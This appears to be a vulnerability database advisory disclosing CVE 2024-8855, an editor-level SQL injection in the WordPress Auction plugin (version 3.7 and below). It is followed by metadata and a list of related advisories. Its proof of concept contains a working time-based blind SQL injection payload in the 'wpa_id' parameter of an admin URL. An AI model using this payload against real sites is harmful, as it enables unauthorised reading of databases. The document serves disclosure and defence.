WordPress Auction <= 3.7 – Editor+ SQL Injection | CVE 2024-8855 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing editors and above to perform SQL injection attacks

Proof of Concept

1. Log in as an editor
3. Go to Manage Auctions Screen and click to "Edit" button of Auction created.
4. Edit param "wpa_id" to payload and confirm vulnerability. Example:

`https://example.com/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))t)&_wpnonce=f4485e7d21`

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Thanh Kieu

Submitter

Thanh Kieu

Verified

Yes

WPVDB ID

04084f2a-45b8-4249-a472-f156fad0c90a

Timeline

Publicly Published

2024-12-17 (about 1 year ago)

Added

2024-12-17 (about 1 year ago)

Last Updated

2024-12-17 (about 1 year ago)

Other

Published

Title

Published

2025-12-01

Title

WP Directory Kit < 1.4.7 - Authenticated (Admin+) SQL Injection

Published

2017-05-31

Title

Easy Team Manager 1.3.2 - Authenticated Blind SQL Injection

Published

2018-02-22

Title

Custom Permalinks <= 1.1 - Authenticated SQL Injection

Published

2024-02-09

Title

Awesome Support – WordPress HelpDesk & Support Plugin < 6.1.8 - Authenticated (Subscriber+) SQL Injection

Published

2025-05-16

Title

CountDown Pro WP Plugin <= 2.7 - Authenticated (Contributor+) SQL Injection